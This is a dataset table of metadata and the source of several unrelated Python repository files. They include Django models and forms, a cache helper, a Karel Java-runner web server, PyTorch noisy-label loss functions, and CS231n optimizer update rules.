blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9611fd8e79e725c836099ca0e2b297efab9883de | 2847f70cb61e57c036ebf3853f85b82350d39241 | /site_settings/models.py | 03da250c68902c7996bbe00f436698cfeac7a65c | [] | no_license | SDupZ/sdup.nz | 6f020c3f074062edf6df734ee75996a50459df42 | a84c8bcbc14e3a086c263c38630555764e0acb71 | refs/heads/master | 2021-01-20T05:13:12.960616 | 2017-06-12T10:28:22 | 2017-06-12T10:28:22 | 89,761,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | from datetime import datetime
from django.db import models
from filer.fields.image import FilerImageField
class HomepageSettings(models.Model):
created = models.DateTimeField(db_index=True, auto_now_add=True)
modified = models.DateTimeField(db_index=True, auto_now=True)
jumbotron_image = FilerImageField(blank=True, null=True, related_name="jumbotron_image")
class Meta:
verbose_name = "Homepage Settings"
| [
"smdupnz@yahoo.co.nz"
] | smdupnz@yahoo.co.nz |
fb3c8d03e35d9a16bcaa330a45d50fdb01bb1c19 | f500caaa13d7471956c04b153ea6cfc841623af6 | /homeassist/util/cache.py | 4526fa71a6e674eae6e118b5abbc3ec34a2e3e1b | [] | no_license | little-young/home-assist | 66ce97f3b573af8ac6d648a096842dc6f19d7ec5 | ab8f703b75c30e7f9bb8b70ffb1a81c7589019c5 | refs/heads/master | 2022-11-25T17:17:58.749991 | 2020-07-30T15:42:03 | 2020-07-30T15:42:03 | 278,770,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,383 | py | from time import time
from homeassist.util.error import Error
CACHE_MEM_DICT = {}
CACHE_TIME_DICT = {}
def check_db(db):
if db not in CACHE_MEM_DICT:
CACHE_MEM_DICT[db] = {}
CACHE_TIME_DICT[db] = {}
def delete(key, db=0):
"""删除键为key的条目"""
check_db(db)
if key in CACHE_MEM_DICT[db]:
del CACHE_MEM_DICT[db][key]
del CACHE_TIME_DICT[db][key]
return True
def get(key, db=0):
check_db(db)
"""获取键key对应的值"""
if key in CACHE_MEM_DICT[db]:
if CACHE_TIME_DICT[db][key] == -1 or CACHE_TIME_DICT[db][key] > time():
return CACHE_MEM_DICT[db][key]
else:
delete(key, db)
return None
else:
return None
def set(key, data, expire=-1, db=0):
"""
:param key:
:param data:
:param expire: 时间位expire 单位秒'''
:param db:
:return:
"""
check_db(db)
CACHE_MEM_DICT[db][key] = data
if expire == -1:
CACHE_TIME_DICT[db][key] = -1
else:
CACHE_TIME_DICT[db][key] = time() + expire
return True
def update_expire_time(key, expire=-1, db=0):
check_db(db)
if not CACHE_MEM_DICT[db].get(key):
raise Error(f"not {key} in {db}")
if expire == -1:
CACHE_TIME_DICT[db][key] = -1
else:
CACHE_TIME_DICT[db][key] = time() + expire
return True
| [
"xiaoyang.wang@luckincoffee.com"
] | xiaoyang.wang@luckincoffee.com |
20c4b3f39164a03f9e109ad879f4ffeb710248ed | c8103407fde3e0462ef77441f8421303ce79ebf3 | /backend/tips/__init__.py | a562431ec09ae4540dab5d178a0736c190f76175 | [
"MIT"
] | permissive | snvfyy/satia | d4f5cb991c85cbe880ec7d8872bc21eb8cb4ed76 | 5142046345b99d595aa49d3bbf79f1619abf5591 | refs/heads/master | 2022-05-02T03:51:32.234579 | 2018-10-24T17:55:21 | 2018-10-24T17:55:21 | 153,897,419 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | def load_fire_tips():
fire_tips = []
with open("./tips/fire_tips", "r") as f:
for line in f.readlines():
fire_tips.append(line)
return fire_tips
| [
"vlad.sabi18@gmail.com"
] | vlad.sabi18@gmail.com |
b44921c2444b6b4af3d4aedf5fafaa97c2468da0 | 0666f52326b56aadf6c3e63bcd7e5c5adf8f4cd2 | /cs106a-hw1-karel2/server.py | 13915f312d905d407646730238cab1bf74b99bbc | [] | no_license | aashidham/benuku_code_sample | 19b62aaf181801a30bf7fad6c8da8158bb1702f7 | ec84ceddade22ee9c72d7896a9b909e531a1ea40 | refs/heads/master | 2020-07-04T11:56:17.271419 | 2016-08-17T21:38:30 | 2016-08-17T21:38:30 | 65,943,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | from werkzeug.wrappers import Response, Request
from werkzeug.serving import run_simple
import eventlet, socketio
import posixpath, urllib, os, mimetypes, json, sqlite3, signal, subprocess
from operator import attrgetter
import time, subprocess
proc = None
sio = socketio.Server()
@sio.on('connect')
def connect(sid, environ):
print("connect ", sid)
@sio.on('chat message')
def message(sid, data):
print "hey there"
print("message ", data)
sio.emit('chat message', data)
@sio.on('disconnect')
def disconnect(sid):
print('disconnect ', sid)
def translate_path(path):
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = os.getcwd()
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir): continue
path = os.path.join(path, word)
return path
def application(environ, start_response):
request = Request(environ)
path = translate_path(request.path)
try:
print "opeining path",path
f = open(path,'rb')
except IOError:
if "fileopen" in request.path:
f2 = open("src/AnythingGoes.java")
inp_text = f2.read()
f2.close()
response = Response(json.dumps({"data":inp_text}), mimetype="application/json")
return response(environ, start_response)
if "filewrite" in request.path:
inp_text = request.form["data"]
f2 = open("src/AnythingGoes.java", 'w')
f2.write(inp_text)
f2.close()
response = Response(json.dumps({"status":"success"}), mimetype="application/json")
return response(environ, start_response)
if "run" in request.path:
global proc
if proc:
os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
#inp_text = request.form["data"]
#f2 = open("src/AnythingGoes.java", 'w')
#f2.write(inp_text)
#f2.close()
out, err = subprocess.Popen("javac -d bin/ -cp lib/karel.jar:bin/:src/ src/*", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
if len(err):
response = Response(json.dumps({"status":"error","data":err}), mimetype="application/json")
return response(environ, start_response)
proc = subprocess.Popen("DISPLAY=:5555 java -cp lib/karel.jar:bin/ AnythingGoes &", shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response = Response(json.dumps({"status":"success"}), mimetype="application/json")
return response(environ, start_response)
# if not, 404 this sucker
response = Response()
response.status_code = 404
return response(environ, start_response)
response = Response(f.read(), mimetype=mimetypes.guess_type(request.path)[0])
return response(environ, start_response)
if __name__ == '__main__':
application = socketio.Middleware(sio, application)
eventlet.wsgi.server(eventlet.listen(('', 80)), application)
#run_simple('0.0.0.0', 80, application, use_debugger=True, use_reloader=True)
| [
"aashidham@gmail.com"
] | aashidham@gmail.com |
ab203dead3895fbe4a0ffe442a2e8d8ab56f1073 | 65ca2789de0a95a7371454a22d8f76256669eafc | /loss.py | aed0aa0f430b6db6a86e037c11639a873cf6f4f4 | [] | no_license | yyy11178/CRSSC | 0f5c1c7414068b40d301f1c60db5844788bc5643 | 97c2f217f3cf5b1af1e20e807c6bc6ee50342a88 | refs/heads/master | 2022-03-03T23:16:20.264106 | 2019-11-15T06:01:04 | 2019-11-15T06:01:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,852 | py | # -*- coding: utf-8 -*-
import torch
import torch.nn.functional as F
from utils.utils import print_to_logfile
torch.manual_seed(0)
torch.cuda.manual_seed(0)
torch.cuda.manual_seed_all(0)
def std_loss(logits, labels, indices, T_k, epoch, memory_pool, eps=0.1):
ce_losses = label_smoothing_cross_entropy(logits, labels, epsilon=eps, reduction='none')
# in the first T_k epochs, train with the entire training set
if epoch < T_k:
# print('using naive CE', end=' <--- ')
return ce_losses, ce_losses
# after T_k epochs, start dividing training set into clean / uncertain / irrelevant
ind_loss_sorted = torch.argsort(ce_losses.data)
num_remember = torch.nonzero(ce_losses < ce_losses.mean()).shape[0]
# print(' ---> {:2d}'.format(num_remember), end=', ')
stats_log_path = 'stats/drop_n_reuse_stats_epoch{:03d}.csv'.format(epoch+1)
print_to_logfile(stats_log_path, '{:03d}'.format(num_remember), init=False, end=',')
ind_clean = ind_loss_sorted[:num_remember]
ind_forget = ind_loss_sorted[num_remember:]
logits_clean = logits[ind_clean]
labels_clean = labels[ind_clean]
if ind_forget.shape[0] > 1:
# for samples with high loss
# high loss, high std --> mislabeling
# high loss, low std --> irrelevant category
indices_forget = indices[ind_forget]
logits_forget = logits[ind_forget]
pred_distribution = F.softmax(logits_forget, dim=1)
batch_std = pred_distribution.std(dim=1)
flag = F.softmax(logits_clean, dim=1).std(dim=1).mean().item()
# print('{:.5f}'.format(flag), end='*****')
batch_std_sorted, ind_std_sorted = torch.sort(batch_std.data, descending=True)
ind_split = split_set(batch_std_sorted, flag)
if ind_split is None:
ind_split = -1
# print('{} == {}'.format(batch_std_sorted, ind_split), end=' ---> ')
# uncertain could be either mislabeled or hard example
ind_uncertain = ind_std_sorted[:(ind_split+1)]
# print('{:2d}/{:2d}'.format(ind_split+1, logits.shape[0] - num_remember), end=' <--- ')
print_to_logfile(stats_log_path,
'{:03d},{:03d}'.format(ind_split+1, logits.shape[0] - num_remember - ind_split - 1),
init=False, end='\n')
logits_mislabeled = logits_forget[ind_uncertain]
indices_mislabeled = indices_forget[ind_uncertain]
labels_mislabeled = memory_pool.most_prob_labels[indices_mislabeled].to(logits_mislabeled.device)
logits_final = torch.cat((logits_clean, logits_mislabeled), dim=0)
labels_final = torch.cat((labels_clean, labels_mislabeled), dim=0)
else:
# print('{:2d}/{:2d}'.format(0, logits.shape[0] - num_remember), end=' <--- ')
print_to_logfile(stats_log_path, '{:03d},{:03d}'.format(0, logits.shape[0] - num_remember), init=False, end='\n')
logits_final = logits_clean
labels_final = labels_clean
std_losses = label_smoothing_cross_entropy(logits_final, labels_final, epsilon=eps, reduction='none')
return std_losses, ce_losses
def split_set(x, flag):
# split set based in interval
# x shape is (N), x is sorted in descending
assert (x > 0).all()
if x.shape[0] == 1:
return None
tmp = (x < flag).nonzero()
if tmp.shape[0] == 0:
return None
else:
return tmp[0, 0] - 1
def label_smoothing_cross_entropy(logit, label, epsilon=0.1, reduction='none'):
N = label.size(0)
C = logit.size(1)
smoothed_label = torch.full(size=(N, C), fill_value=epsilon / (C - 1))
smoothed_label.scatter_(dim=1, index=torch.unsqueeze(label, dim=1).cpu(), value=1-epsilon)
if logit.is_cuda:
smoothed_label = smoothed_label.cuda()
log_logit = F.log_softmax(logit, dim=1)
losses = -torch.sum(log_logit * smoothed_label, dim=1) # (N)
if reduction == 'none':
return losses
elif reduction == 'mean':
return torch.sum(losses) / N
elif reduction == 'sum':
return torch.sum(losses)
else:
raise AssertionError('reduction has to be none, mean or sum')
def cot_std_loss(logits1, logits2, labels, indices, T_k, epoch, memory_pool1, memory_pool2, eps=0.1):
ce_losses1 = label_smoothing_cross_entropy(logits1, labels, epsilon=eps, reduction='none') # (N,)
ce_losses2 = label_smoothing_cross_entropy(logits2, labels, epsilon=eps, reduction='none') # (N,)
# in the first T_k epochs, train with the entire training set
if epoch < T_k:
# print('using naive CE', end=' <--- ')
return ce_losses1, ce_losses1, ce_losses2, ce_losses2
# after T_k epochs, start dividing training set into clean / uncertain / irrelevant
ind_loss_sorted1 = torch.argsort(ce_losses1.data)
ind_loss_sorted2 = torch.argsort(ce_losses2.data)
num_remember1 = torch.nonzero(ce_losses1 < ce_losses1.mean()).shape[0]
num_remember2 = torch.nonzero(ce_losses2 < ce_losses2.mean()).shape[0]
# print(' ---> {:2d}, {:2d}'.format(num_remember1, num_remember1), end=', ')
stats_log_path1 = 'stats/net1_drop_n_reuse_stats_epoch{:03d}.csv'.format(epoch + 1)
stats_log_path2 = 'stats/net2_drop_n_reuse_stats_epoch{:03d}.csv'.format(epoch + 1)
print_to_logfile(stats_log_path1, '{:03d}'.format(num_remember1), init=False, end=',')
print_to_logfile(stats_log_path2, '{:03d}'.format(num_remember2), init=False, end=',')
ind_clean1 = ind_loss_sorted1[:num_remember1]
ind_clean2 = ind_loss_sorted2[:num_remember2]
ind_forget1 = ind_loss_sorted1[num_remember1:]
ind_forget2 = ind_loss_sorted2[num_remember2:]
logits_clean1 = logits1[ind_clean2]
logits_clean2 = logits2[ind_clean1]
labels_clean1 = labels[ind_clean2]
labels_clean2 = labels[ind_clean1]
logits_final1 = logits_clean1
logits_final2 = logits_clean2
labels_final1 = labels_clean1
labels_final2 = labels_clean2
if ind_forget1.shape[0] > 1:
# for samples with high loss
# high loss, high std --> mislabeling
# high loss, low std --> irrelevant category
# indices_forget1 = indices[ind_forget1]
logits_forget1 = logits1[ind_forget1]
pred_distribution1 = F.softmax(logits_forget1, dim=1)
batch_std1 = pred_distribution1.std(dim=1)
flag1 = F.softmax(logits_clean1, dim=1).std(dim=1).mean().item()
# print('{:.5f}'.format(flag), end='*****')
batch_std_sorted1, ind_std_sorted1 = torch.sort(batch_std1.data, descending=True)
ind_split1 = split_set(batch_std_sorted1, flag1)
if ind_split1 is None:
ind_split1 = -1
# print('{} == {}'.format(batch_std_sorted, ind_split), end=' ---> ')
# uncertain could be either mislabeled or hard example
ind_uncertain1 = ind_std_sorted1[:(ind_split1 + 1)]
# print('{:2d}/{:2d}'.format(ind_split1 + 1, logits1.shape[0] - num_remember1), end=' <--- ')
print_to_logfile(stats_log_path1,
'{:03d},{:03d}'.format(ind_split1+1, logits1.shape[0] - num_remember1 - ind_split1 - 1))
ind_mislabeled1 = ind_forget1[ind_uncertain1]
logits_mislabeled2 = logits2[ind_mislabeled1]
indices_mislabeled2 = indices[ind_mislabeled1]
labels_mislabeled2 = memory_pool2.most_prob_labels[indices_mislabeled2].to(logits_mislabeled2.device)
logits_final2 = torch.cat((logits_final2, logits_mislabeled2), dim=0)
labels_final2 = torch.cat((labels_final2, labels_mislabeled2), dim=0)
if ind_forget2.shape[0] > 1:
# for samples with high loss
# high loss, high std --> mislabeling
# high loss, low std --> irrelevant category
# indices_forget2 = indices[ind_forget2]
logits_forget2 = logits2[ind_forget2]
pred_distribution2 = F.softmax(logits_forget2, dim=1)
batch_std2 = pred_distribution2.std(dim=1)
flag2 = F.softmax(logits_clean2, dim=1).std(dim=1).mean().item()
# print('{:.5f}'.format(flag), end='*****')
batch_std_sorted2, ind_std_sorted2 = torch.sort(batch_std2.data, descending=True)
ind_split2 = split_set(batch_std_sorted2, flag2)
if ind_split2 is None:
ind_split2 = -1
# print('{} == {}'.format(batch_std_sorted, ind_split), end=' ---> ')
# uncertain could be either mislabeled or hard example
ind_uncertain2 = ind_std_sorted2[:(ind_split2 + 1)]
# print('{:2d}/{:2d}'.format(ind_split2 + 1, logits2.shape[0] - num_remember2), end=' <--- ')
print_to_logfile(stats_log_path2,
'{:03d},{:03d}'.format(ind_split2+1, logits2.shape[0] - num_remember2 - ind_split2 - 1))
ind_mislabeled2 = ind_forget2[ind_uncertain2]
logits_mislabeled1 = logits1[ind_mislabeled2]
indices_mislabeled1 = indices[ind_mislabeled2]
labels_mislabeled1 = memory_pool1.most_prob_labels[indices_mislabeled1].to(logits_mislabeled1.device)
logits_final1 = torch.cat((logits_final1, logits_mislabeled1), dim=0)
labels_final1 = torch.cat((labels_final1, labels_mislabeled1), dim=0)
else:
# print('{:2d}/{:2d}, {:2d}/{:2d}'.format(0, logits1.shape[0] - num_remember1,
# 0, logits2.shape[0] - num_remember2), end=' <--- ')
print_to_logfile(stats_log_path1, '{:03d},{:03d}'.format(0, logits1.shape[0] - num_remember1))
print_to_logfile(stats_log_path2, '{:03d},{:03d}'.format(0, logits2.shape[0] - num_remember2))
losses1 = label_smoothing_cross_entropy(logits_final1, labels_final1, epsilon=eps, reduction='none')
losses2 = label_smoothing_cross_entropy(logits_final2, labels_final2, epsilon=eps, reduction='none')
return losses1, ce_losses1, losses2, ce_losses2
| [
"fg_nust_3@163.com"
] | fg_nust_3@163.com |
91ffcd83defc9e9403a8e76012c3754f335db4fa | 8661aca3cd633d3f50cfd19d4d5e2c864ca5e71c | /Ex009.py | fa77ecda8d0ce94d40879d21b8736c706e3499a1 | [] | no_license | hianp/Exercicios_Curso_em_video_Py | 043cfba7e7fb558a6f4d972acd5367c9f15718e2 | 51a3e71504bb8db6debd0fa7992b929d712f4b2f | refs/heads/main | 2023-03-21T14:20:43.509963 | 2021-03-10T23:47:01 | 2021-03-10T23:47:01 | 335,655,362 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | n = int(input('Digite um número: '))
print('A tabuada do número {} é:'.format(n))
print('{} x 1 = {}'.format(n, n*1))
print('{} x 2 = {}'.format(n, n*2))
print('{} x 3 = {}'.format(n, n*3))
print('{} x 4 = {}'.format(n, n*4))
print('{} x 5 = {}'.format(n, n*5))
print('{} x 6 = {}'.format(n, n*6))
print('{} x 7 = {}'.format(n, n*7))
print('{} x 8 = {}'.format(n, n*8))
print('{} x 9 = {}'.format(n, n*9))
print('{} x 10 = {}'.format(n, n*10))
| [
"noreply@github.com"
] | hianp.noreply@github.com |
c4149668fc54104349962cc2f172eb9e34b861d5 | 2b45da1be780556426e707da7fa73756cea02ba5 | /main_app/migrations/0002_auto_20210203_0736.py | bf9af9023dd9521919d04226bd38535e1daeda50 | [] | no_license | abonilla1/offThePace | 7e350efc22ad5ba1531bb8c7085d1f08bb9a6e8d | d3debd4ef6703919b7cddfd5e102d9b3decac413 | refs/heads/main | 2023-03-10T21:41:34.665850 | 2021-02-10T11:31:02 | 2021-02-10T11:31:02 | 335,526,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py | # Generated by Django 3.1.6 on 2021-02-03 07:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main_app', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Race',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('host_track', models.CharField(max_length=200)),
('city', models.CharField(max_length=200)),
('field_size', models.IntegerField()),
('grade', models.CharField(choices=[('G1', 'GRADE ONE'), ('G2', 'GRADE TWO'), ('G3', 'GRADE THREE')], max_length=2)),
('distance', models.CharField(max_length=200)),
('race_date', models.DateField()),
('entries', models.TextField(max_length=500)),
],
),
migrations.AddField(
model_name='horse',
name='race',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, to='main_app.race'),
),
]
| [
"amariabrown015@gmail.com"
] | amariabrown015@gmail.com |
76773f8a01b7a8807b6f82164ffad3f9efad41d6 | 6dd08121190d58eb9c934c6f631768fa1b56f7b2 | /assignment2/cs231n/optim.py | dae457a240b33995d83e7e227d66443cfd9287ba | [] | no_license | naineshhulke/CS231n-2019-Assignments | 414460d509d67af2b17cdb83fbb2413a8d187142 | 1f0c0120c87bdf0439c50249bcc4de3c01aba4a9 | refs/heads/master | 2022-12-11T11:10:54.769042 | 2019-10-22T11:18:35 | 2019-10-22T11:18:35 | 185,601,578 | 0 | 1 | null | 2022-12-08T05:17:51 | 2019-05-08T12:27:38 | Jupyter Notebook | UTF-8 | Python | false | false | 6,649 | py | import numpy as np
"""
This file implements various first-order update rules that are commonly used
for training neural networks. Each update rule accepts current weights and the
gradient of the loss with respect to those weights and produces the next set of
weights. Each update rule has the same interface:
def update(w, dw, config=None):
Inputs:
- w: A numpy array giving the current weights.
- dw: A numpy array of the same shape as w giving the gradient of the
loss with respect to w.
- config: A dictionary containing hyperparameter values such as learning
rate, momentum, etc. If the update rule requires caching values over many
iterations, then config will also hold these cached values.
Returns:
- next_w: The next point after the update.
- config: The config dictionary to be passed to the next iteration of the
update rule.
NOTE: For most update rules, the default learning rate will probably not
perform well; however the default values of the other hyperparameters should
work well for a variety of different problems.
For efficiency, update rules may perform in-place updates, mutating w and
setting next_w equal to w.
"""
def sgd(w, dw, config=None):
"""
Performs vanilla stochastic gradient descent.
config format:
- learning_rate: Scalar learning rate.
"""
if config is None: config = {}
config.setdefault('learning_rate', 1e-2)
w -= config['learning_rate'] * dw
return w, config
def sgd_momentum(w, dw, config=None):
"""
Performs stochastic gradient descent with momentum.
config format:
- learning_rate: Scalar learning rate.
- momentum: Scalar between 0 and 1 giving the momentum value.
Setting momentum = 0 reduces to sgd.
- velocity: A numpy array of the same shape as w and dw used to store a
moving average of the gradients.
"""
if config is None: config = {}
config.setdefault('learning_rate', 1e-2)
config.setdefault('momentum', 0.9)
v = config.get('velocity', np.zeros_like(w))
m = config['momentum']
lr = config['learning_rate']
next_w = None
###########################################################################
# TODO: Implement the momentum update formula. Store the updated value in #
# the next_w variable. You should also use and update the velocity v. #
###########################################################################
# *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
v = v*m - lr* dw
next_w = w +v
# *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
###########################################################################
# END OF YOUR CODE #
###########################################################################
config['velocity'] = v
return next_w, config
def rmsprop(w, dw, config=None):
"""
Uses the RMSProp update rule, which uses a moving average of squared
gradient values to set adaptive per-parameter learning rates.
config format:
- learning_rate: Scalar learning rate.
- decay_rate: Scalar between 0 and 1 giving the decay rate for the squared
gradient cache.
- epsilon: Small scalar used for smoothing to avoid dividing by zero.
- cache: Moving average of second moments of gradients.
"""
if config is None: config = {}
config.setdefault('learning_rate', 1e-2)
config.setdefault('decay_rate', 0.99)
config.setdefault('epsilon', 1e-8)
config.setdefault('cache', np.zeros_like(w))
next_w = None
###########################################################################
# TODO: Implement the RMSprop update formula, storing the next value of w #
# in the next_w variable. Don't forget to update cache value stored in #
# config['cache']. #
###########################################################################
# *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
decay = config['decay_rate']
epsilon = config['epsilon']
lr = config['learning_rate']
grad_sq = config['cache']
grad_sq = decay*grad_sq + (1-decay)*(dw**2)
next_w = w - lr*dw/(epsilon + np.sqrt(grad_sq))
config['cache'] = grad_sq
# *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
###########################################################################
# END OF YOUR CODE #
###########################################################################
return next_w, config
def adam(w, dw, config=None):
"""
Uses the Adam update rule, which incorporates moving averages of both the
gradient and its square and a bias correction term.
config format:
- learning_rate: Scalar learning rate.
- beta1: Decay rate for moving average of first moment of gradient.
- beta2: Decay rate for moving average of second moment of gradient.
- epsilon: Small scalar used for smoothing to avoid dividing by zero.
- m: Moving average of gradient.
- v: Moving average of squared gradient.
- t: Iteration number.
"""
if config is None: config = {}
learning_rate = config.setdefault('learning_rate', 1e-3)
beta1 = config.setdefault('beta1', 0.9)
beta2 = config.setdefault('beta2', 0.999)
eps = config.setdefault('epsilon', 1e-8)
m = config.setdefault('m', np.zeros_like(w))
v = config.setdefault('v', np.zeros_like(w))
t = config.setdefault('t', 1)
###########################################################################
# TODO: Implement the Adam update formula, storing the next value of x in #
# the next_x variable. Don't forget to update the m, v, and t variables #
# stored in config. #
###########################################################################
t += 1
m = beta1 * m + (1 - beta1) * dw
mt = m / (1 - beta1 ** t)
v = beta2 * v + (1 - beta2) * (dw ** 2)
vt = v / (1 - beta2 ** t)
next_w = w - learning_rate * mt / (np.sqrt(vt) + eps)
config['t'] = t
config['m'] = m
config['v'] = v
# *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****
###########################################################################
# END OF YOUR CODE #
###########################################################################
return next_w, config
| [
"thenainesh@gmail.com"
] | thenainesh@gmail.com |
4d271fa9f696c201b66ded9d03285d14b12361db | 178a2253f431bc580b4d913ce25e229e1d4570f3 | /users/forms.py | 59a158eeedc57db18e58e66f02d82b64e376266f | [] | no_license | 2501070055/jinciAPP | 39340dd761f2af6330eecb3ceb289b0cb8c1774f | 24eacd74f803e8769fbaeffe97a5950b4dc093b1 | refs/heads/main | 2023-07-16T01:12:16.385701 | 2021-08-31T02:28:26 | 2021-08-31T02:28:26 | 401,547,000 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,575 | py | import datetime
import logging
import random
import re
from django import forms
from django.contrib.auth import login, authenticate
from django.core.cache import cache
from django.db import transaction
from django.utils.timezone import now
from users.choices import SexChoices
from users.models import User, UserInfo
logs = logging.getLogger('log')
class RegisterForm(forms.Form):
"""
用户注册
"""
email = forms.CharField(label='邮箱',
max_length=128,
required=True,
error_messages={
'required': '输入正确的邮箱,建议使用QQ邮箱或者163邮箱'
})
password = forms.CharField(label='用户密码',
max_length=256,
required=True,
error_messages={
'required': '密码一定要滴'
})
nickname = forms.CharField(label='昵称',
max_length=16,
required=True,
error_messages={
'required': '昵称不可为空'
})
def clean_email(self):
"""
验证邮箱是不输入正确
:return: email
"""
email = self.cleaned_data['email']
pattern = r'^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$'
if not re.search(pattern, email):
raise forms.ValidationError('邮箱%s输入有问题',
code='invalid_email',
params=(email, ))
if User.objects.filter(email=email).exists():
raise forms.ValidationError('邮箱%s已经存在啦',
code='exist_email',
params=(email, ))
return email
def clean_nickname(self):
"""
昵称验证
:return: email
"""
nickname = self.cleaned_data['nickname']
if User.objects.filter(nickname=nickname).exists():
raise forms.ValidationError('昵称%s已被使用啦',
code='exist_nickname',
params=(nickname, ))
return nickname
def clean(self):
data = super().clean()
logs.info(data)
if self.errors:
return
return data
@transaction.atomic()
def do_register(self, request):
"""
注册
:param request: 请求对象
:return: user,info对象
"""
data = self.cleaned_data
version = request.headers.get('version', '')
source = request.headers.get('source', '')
try:
# 1. 创建基础信息表
user = User.objects.create_user(
email=data.get('email', None),
username=data.get('email', None),
password=data.get('password', None),
nickname=data.get('nickname', None)
)
# 2. 创建详细表
user_info = UserInfo.objects.create(
user=user,
username=user.username,
email=user.email,
version=version,
source=source
)
# 3. 执行登录
login(request, user)
# 4. 记录登录日志
user.last_login = now()
user.date_joined = now()
user.save()
ip = request.META.get('REMOTE_ADDR', '')
# 5. 记录登录历史
user.add_login_record(
username=user.username,
ip=ip,
version=version,
source=source
)
return True
except Exception as e:
logs.error(e)
return None
class LoginForm(forms.Form):
"""
登录表单
"""
username = forms.CharField(label='用户',
max_length=100,
required=False,
help_text='用户邮箱',
initial='2501070055@qq.com')
password = forms.CharField(label='密码',
max_length=200,
min_length=6,
widget=forms.PasswordInput)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# 当前登录的用户
self.user = None
def clean_username(self):
""" 验证用户名 hook 钩子函数 """
username = self.cleaned_data['username']
pattern = r'^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$'
if not re.search(pattern, username):
raise forms.ValidationError('邮箱%s输入不正确',
code='invalid_email',
params=(username, ))
return username
def clean(self):
data = super().clean()
logs.info(data)
# 如果单个字段有错误,直接返回,不执行后面的验证
if self.errors:
return
username = data.get('username', None)
password = data.get('password', None)
user = authenticate(username=username, password=password)
if user is None:
raise forms.ValidationError('用户名不存在或者密码不正确')
else:
if not user.is_active:
raise forms.ValidationError('该用户已经被禁用')
self.user = user
return data
@transaction.atomic()
def do_login(self, request):
""" 执行用户登录 """
try:
user = self.user
# 调用登录
login(request, user)
# 修改最后登录的时间
user.last_login = now()
user.save()
# 保存登录历史
ip = request.META.get('REMOTE_ADDR', '')
version = request.headers.get('version', '')
source = request.headers.get('source', '')
user.add_login_record(
username=user.info.username,
ip=ip,
version=version,
source=source
)
return True
except Exception as e:
logs.error(e)
return None
class DetailForm(forms.Form):
username = forms.CharField(label='用户名',
required=False)
signature = forms.CharField(label='个性签名',
required=False,
help_text='个性签名',
initial='这个人太懒了,什么也没有留下')
sex = forms.ChoiceField(choices=SexChoices.choices,
required=False,
initial=0)
age = forms.DecimalField(label='年龄',
min_value=0,
max_value=200,
max_digits=16,
decimal_places=0,
initial=18,
required=False)
avatar = forms.ImageField(label='图片',
required=False)
def clean_sex(self):
sex = self.cleaned_data.get('sex')
if sex == '':
sex = '1'
if int(sex) not in (0, 1):
raise forms.ValidationError('只能填0或者1,1为男,0为女')
return sex
def clean_age(self):
age = self.cleaned_data.get('age')
if age is None:
age = '18'
return age
def clean(self):
data = super().clean()
logs.info(data)
# 如果单个字段有错误,直接返回,不执行后面的验证
if self.errors:
return
return data
@transaction.atomic()
def do_change_detail(self, request):
"""
修改用户详细信息
:return: data
"""
try:
user = request.user
data = self.cleaned_data
signature = data.get('signature', '')
sex = data.get('sex', '')
age = data.get('age', '')
avatar = data.get('avatar', '')
username = data.get('username', '')
user.info.user_id = user.id
user_info = user.info
# 上传avatar修改图片名字
if avatar is not None:
ext = avatar.name.split('.')[-1]
new_avatar_name = str(random.randint(111111, 999999)) + datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
avatar.name = '{}'.format(new_avatar_name) + '.' + ext
user_info.avatar = request.FILES.get('avatar')
user_info.signature = signature
user_info.sex = sex
user_info.age = age
user_info.username = username
user_info.save()
return True
except Exception as e:
logs.error(e)
return None
| [
"noreply@github.com"
] | 2501070055.noreply@github.com |
